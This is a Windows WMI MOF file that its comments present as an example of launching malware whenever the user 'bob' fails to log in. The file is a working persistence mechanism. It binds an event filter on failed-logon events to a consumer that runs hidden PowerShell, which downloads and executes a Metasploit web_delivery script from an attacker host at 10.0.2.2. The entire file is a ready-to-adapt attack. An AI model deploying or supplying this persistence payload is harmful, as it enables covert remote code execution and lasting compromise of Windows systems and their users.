// Example of a MOF file to launch malware whenever the user 'bob' fails to log in.
// The approach taken is to use a script generated by the Metasploit module exploit/multi/script/web_delivery
// and call back to a host at 10.0.2.2. To take this approach, the attacker needs to modify the CommandLineTemplate
// to match their environment.
#pragma namespace ("\\\\.\\root\\subscription")

instance of __EventFilter as $Filter
{
  Name = "LogonFilter";
  Query = "SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA \"Win32_NTLogEvent\" AND Targetinstance.EventCode = \"4625\" AND TargetInstance.Message LIKE \"%bob%\" "; 
  QueryLanguage = "WQL";
  EventNamespace = "root\\cimv2";
};

instance of CommandLineEventConsumer as $Consumer
{
  Name = "LogonConsumer";
  CommandLineTemplate = "powershell.exe -nop -w hidden -c $O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $O.downloadstring('http://10.0.2.2:8080/bob');";
    
};

instance of __FilterToConsumerBinding
{
  Filter = $Filter;
  Consumer = $Consumer;
};
